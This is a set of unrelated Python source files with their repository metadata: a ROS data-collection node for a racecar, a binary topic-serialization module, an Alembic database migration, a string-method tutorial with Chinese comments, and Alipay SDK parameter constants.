ec5eadb137da8428642b3ffd1b8ca31fde4f6dff
|
refs/heads/master
| 2023-03-04T21:08:12.799694
| 2021-02-18T00:11:46
| 2021-02-18T00:11:46
| 230,968,509
| 0
| 0
|
MIT
| 2021-02-16T17:34:01
| 2019-12-30T19:25:59
|
Python
|
UTF-8
|
Python
| false
| false
| 4,887
|
py
|
#!/usr/bin/env python
import rospy
import cv2
from std_msgs.msg import String
from sensor_msgs.msg import Image, CompressedImage,LaserScan
from cv_bridge import CvBridge, CvBridgeError
from message_filters import ApproximateTimeSynchronizer, Subscriber
from ackermann_msgs.msg import AckermannDriveStamped
import imutils
from race.msg import drive_param
import os
import rospkg
import numpy as np
# import sys so we can use packages outside of this folder in
# either python 2 or python 3, I know it's janky, chill
import sys
import os
from pathlib import Path
#insert parent directory into the path
sys.path.insert(0,str(Path(os.path.abspath(__file__)).parent.parent))
from preprocessing.utils import ImageUtils
class MessageSynchronizer:
''' Gathers messages with vehicle information that have similar time stamps
/camera/zed/rgb/image_rect_color/compressed: 18 hz
/camera/zed/rgb/image_rect_color: 18 hz
/vesc/ackermann_cmd_mux/input/teleop: 40 hz
'''
def __init__(self,racecar_name,vesc_name,data_path):
self.image_topic = racecar_name+'/camera/zed/rgb/image_rect_color'
self.drive_topic = vesc_name+'/ackermann_cmd_mux/input/teleop'
self.lidar_topic = racecar_name+'/scan'
print(self.image_topic,self.drive_topic,self.lidar_topic)
self.image_rect_color=Subscriber(self.image_topic,Image)
self.ackermann_stamped=Subscriber(self.drive_topic,AckermannDriveStamped)
self.lidar_sub=Subscriber(self.lidar_topic,LaserScan)
r = rospkg.RosPack()
self.util=ImageUtils()
self.save_path_root=os.path.sep.join([r.get_path('computer_vision'),data_path])
self.cv_bridge=CvBridge()
self.count=0
self.save_count=0
#create the time synchronizer
self.sub = ApproximateTimeSynchronizer([self.image_rect_color,self.ackermann_stamped,self.lidar_sub], queue_size = 20, slop = 0.08)
#register the callback to the synchronizer
self.sub.registerCallback(self.master_callback)
#callback for the synchronized messages
#Note: a negative value means turning to the right, a postive value means turning to the left
def master_callback(self,image,ackermann_msg,lidar_msg): #drive_param):
#convert rosmsg to cv image
try:
cv_image=self.cv_bridge.imgmsg_to_cv2(image,"bgr8")
self.count+=1
except CvBridgeError as e:
print(e)
#convert the steering command to a string to I can store it with the image name
#for efficient data storage
command='%.10f' % ackermann_msg.drive.steering_angle
#replace the period with ~ so it's a valid filename
command=command.replace('.','~')
#save path
save_path=os.path.join(self.save_path_root,self.label_image(ackermann_msg.drive.steering_angle),str(rospy.Time.now())+'~'+command+'.png')
limited_ranges=np.asarray(lidar_msg.ranges)
indices=np.where(limited_ranges>=10.0)[0]
limited_ranges[indices]=10.0
limited_ranges= limited_ranges[29:1053]
limited_ranges = limited_ranges.reshape((32,32,1))
limited_ranges = limited_ranges
if(self.count % 1==0):
dirPath = os.path.split(save_path)[0]
if not 'straight' in dirPath and 'weak_right' not in dirPath and 'weak_left' not in dirPath:
self.save_image(cv_image,save_path)
np.save(save_path.replace(".png",".npy"),limited_ranges)
self.save_count+=1
self.count+=1
#function that categorizes images into left, weak_left, straight, weak_right, right
def label_image(self,steering_angle):
if(steering_angle<-0.261799):
return "right"
elif(steering_angle>0.261799):
return "left"
elif(steering_angle<-0.0523599 and steering_angle>-0.261799):
return "weak_right"
elif(steering_angle>0.0523599 and steering_angle<0.261799):
return "weak_left"
else:
return "straight"
def save_image(self,image,path):
dirPath = os.path.split(path)[0]
# if the output directory does not exist, create it
if not os.path.exists(dirPath):
os.makedirs(dirPath)
print('does not exist')
print(path)
cv2.imwrite(path,image)
if __name__=='__main__':
rospy.init_node('image_command_sync')
args = rospy.myargv()[1:]
# get the racecar name so we know what to subscribe to
racecar_name=args[0]
# get the name of the vesc for the car
vesc_name=args[1]
# path where to store the dataset
data_path = args[2]
# initialize the message filter
mf=MessageSynchronizer(racecar_name,vesc_name,data_path)
# spin so that we can receive messages
rospy.spin()
|
[
"pmusau13ster@gmail.com"
] |
pmusau13ster@gmail.com
|
ab6cd8266c32908502d62a2aa3848a27d9d5182b
|
4014aa4a5ce0af0f10016b8fd056e26c147e8b42
|
/stdlib/src/hmap/std/matching/topic_based/topic_types/flat_numbers.py
|
4d48e4cc7bf94ad24eac0e2ff27f4449bf6692f1
|
[
"MIT"
] |
permissive
|
gregjhansell97/hive-map-python-3
|
d09ac97a89a9cbddf26ab1c91f698d9e44941144
|
d3d4f826f154a2aeea7e251266c221f629574b83
|
refs/heads/master
| 2020-07-31T12:23:55.983819
| 2020-04-28T23:52:49
| 2020-04-28T23:52:49
| 210,602,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,012
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from abc import abstractmethod
import struct
from hmap.interface.matching.topic_based import HashableTopic
class FlatNumber(HashableTopic):
fmt = ""
def __init__(self, content):
# TODO move to super class (FlatNumber)
self.__raw = struct.pack(self.fmt, content)
self.__content = content
@property
def content(self):
return self.__content
def calcsize(self):
return struct.calcsize(self.fmt)
@classmethod
def serialize(cls, instance):
return instance.__raw
@classmethod
def deserialize(cls, raw_data, lazy=False):
return cls(struct.unpack_from(cls.fmt, raw_data, offset=0)[0])
# return remaining bytes
class FlatByte(FlatNumber):
fmt = "b"
class FlatUByte(FlatNumber):
fmt = "B"
class FlatInt(FlatNumber):
fmt = "i"
class FlatUInt(FlatNumber):
fmt = "I"
# hide parent class
__all__ = ["FlatByte", "FlatUByte", "FlatInt", "FlatUInt"]
|
[
"gregjhansell@gmail.com"
] |
gregjhansell@gmail.com
|
fc81fc7ae77bb68bbe360d676d6ea0f9dc2ffdda
|
867796f20586cfa70422945d98e7d5e99edbabc2
|
/contactista/migrations/ed99772734e1_initial_revision.py
|
a7f31619c7e62a4b989f9d250739bd7809b112ba
|
[
"MIT"
] |
permissive
|
rizplate/contactista
|
500cf7f640b3db94d0b49b921e4b09abdfc56d5b
|
8b3030487518cd4767078703aee04041d2004725
|
refs/heads/master
| 2020-03-28T11:37:02.932371
| 2017-09-15T18:55:52
| 2017-09-15T18:56:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,048
|
py
|
"""Initial revision
Revision ID: ed99772734e1
Revises:
Create Date: 2017-08-01 12:48:40.754913
"""
import os
import json
from alembic import op
import sqlalchemy as sa
from sqlalchemy.schema import Sequence, CreateSequence, DropSequence
# revision identifiers, used by Alembic.
revision = 'ed99772734e1'
down_revision = None
branch_labels = ('default',)
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
pronouns_table = op.create_table('pronouns',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('subject_pronoun', sa.String(length=50), nullable=False),
sa.Column('object_pronoun', sa.String(length=50), nullable=False),
sa.Column('possessive_determiner', sa.String(length=50), nullable=False),
sa.Column('possessive_pronoun', sa.String(length=50), nullable=False),
sa.Column('reflexive_pronoun', sa.String(length=50), nullable=False),
sa.PrimaryKeyConstraint('id')
)
role_table = op.create_table('role',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('description', sa.String(length=255), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(length=255), nullable=False),
sa.Column('password', sa.String(length=255), nullable=True),
sa.Column('active', sa.Boolean(), nullable=True),
sa.Column('confirmed_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)
op.create_table('contact',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('note', sa.Text(), nullable=True),
sa.Column('note_format', sa.String(length=20), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('roles_users',
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('role_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['role_id'], ['role.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], )
)
op.create_table('contact_email',
sa.Column('contact_id', sa.Integer(), nullable=False),
sa.Column('category', sa.String(length=50), nullable=False),
sa.Column('position', sa.Integer(), nullable=False),
sa.Column('email', sa.Text(), nullable=False),
sa.ForeignKeyConstraint(['contact_id'], ['contact.id'], ),
sa.PrimaryKeyConstraint('contact_id', 'category')
)
op.execute(CreateSequence(Sequence('contact_email_position')))
op.create_table('contact_name',
sa.Column('contact_id', sa.Integer(), nullable=False),
sa.Column('category', sa.String(length=50), nullable=False),
sa.Column('position', sa.Integer(), nullable=False),
sa.Column('name', sa.Text(), nullable=False),
sa.ForeignKeyConstraint(['contact_id'], ['contact.id'], ),
sa.PrimaryKeyConstraint('contact_id', 'category')
)
op.execute(CreateSequence(Sequence('contact_name_position')))
op.create_table('contact_pronouns',
sa.Column('contact_id', sa.Integer(), nullable=False),
sa.Column('pronouns_id', sa.Integer(), nullable=False),
sa.Column('position', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['contact_id'], ['contact.id'], ),
sa.ForeignKeyConstraint(['pronouns_id'], ['pronouns.id'], ),
sa.PrimaryKeyConstraint('contact_id', 'pronouns_id')
)
op.execute(CreateSequence(Sequence('contact_pronouns_position')))
# ### end Alembic commands ###
# Seed database with default data
op.bulk_insert(role_table, rows=[
{"name": "superuser", "description": "Unlimited access"},
])
pronouns_fixture_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"fixtures",
"pronouns.json",
)
with open(pronouns_fixture_path) as f:
pronouns_list = json.load(f)
pronouns_objs = [{
"subject_pronoun": line[0],
"object_pronoun": line[1],
"possessive_determiner": line[2],
"possessive_pronoun": line[3],
"reflexive_pronoun": line[4],
} for line in pronouns_list]
op.bulk_insert(pronouns_table, rows=pronouns_objs)
def downgrade():
for seqname in ('contact_pronouns_position', 'contact_name_position',
'contact_email_position',
):
op.execute(DropSequence(Sequence(seqname)))
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('contact_pronouns')
op.drop_table('contact_name')
op.drop_table('contact_email')
op.drop_table('roles_users')
op.drop_table('contact')
op.drop_index(op.f('ix_user_username'), table_name='user')
op.drop_table('user')
op.drop_table('role')
op.drop_table('pronouns')
# ### end Alembic commands ###
|
[
"david@davidbaumgold.com"
] |
david@davidbaumgold.com
|
b6ddfd1034f68fcb04d7dd7367c60d64d74c567f
|
0da8fdae806b73e9dc57e052dcf1171c5a2c7f28
|
/01_Python基础/05_高级数据类型/study_17_字符串的查找和替换.py
|
21ac39e23afe3709e5be97d72fd7c073e80aff77
|
[] |
no_license
|
xujinshan361/python_study_code
|
ed37db128c55ee2ad9f7b2db04785c632a7115d4
|
e6ce0bdd8243dfaadf56213ef0120d215de0d0cd
|
refs/heads/master
| 2020-12-10T12:19:45.792310
| 2020-01-13T12:48:22
| 2020-01-13T12:48:22
| 233,592,034
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 666
|
py
|
hello_str = "hello word"
# 1.判断是否以指定字符串开始
print(hello_str.startswith("he"))
# 2.判断是否以指定字符串结束
print(hello_str.endswith("word"))
# 3.查找指定字符串
# index同样可以查找指定的字符串在大字符串中的索引
print(hello_str.find("lo"))
# index 如果指定的字符串不存在,会报错
# find如果指定的字符串不存在,会返回-1
# print(hello_str.index("abc"))
print(hello_str.find("abc"))
# 4.替换字符串
# replace 方法执行完成后,会返回一个新的字符串
# 注意:不会修改原有的字符串内容
print(hello_str.replace("word", "python"))
print(hello_str)
|
[
"xujinshan361@163.com"
] |
xujinshan361@163.com
|
e40d8657052e26d4cd67730ceea350b9fcbf5a6c
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/constant/ParamConstants.py
|
1de953edff0cd37434ed88f9fc6c6feb2d8c34c5
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 938
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on 2017-12-20
@author: liuqun
'''
COMMON_PARAM_KEYS = set()
P_APP_ID = "app_id"
COMMON_PARAM_KEYS.add(P_APP_ID)
P_METHOD = "method"
COMMON_PARAM_KEYS.add(P_METHOD)
P_FORMAT = "format"
COMMON_PARAM_KEYS.add(P_FORMAT)
P_CHARSET = "charset"
COMMON_PARAM_KEYS.add(P_CHARSET)
P_SIGN_TYPE = "sign_type"
COMMON_PARAM_KEYS.add(P_SIGN_TYPE)
P_SIGN = "sign"
COMMON_PARAM_KEYS.add(P_SIGN)
P_ENCRYPT_TYPE = "encrypt_type"
COMMON_PARAM_KEYS.add(P_ENCRYPT_TYPE)
P_TIMESTAMP = "timestamp"
COMMON_PARAM_KEYS.add(P_TIMESTAMP)
P_VERSION = "version"
COMMON_PARAM_KEYS.add(P_VERSION)
P_NOTIFY_URL = "notify_url"
COMMON_PARAM_KEYS.add(P_NOTIFY_URL)
P_RETURN_URL = "return_url"
COMMON_PARAM_KEYS.add(P_RETURN_URL)
P_AUTH_TOKEN = "auth_token"
COMMON_PARAM_KEYS.add(P_AUTH_TOKEN)
P_APP_AUTH_TOKEN = "app_auth_token"
COMMON_PARAM_KEYS.add(P_APP_AUTH_TOKEN)
P_BIZ_CONTENT = "biz_content"
|
[
"liuqun.lq@alibaba-inc.com"
] |
liuqun.lq@alibaba-inc.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.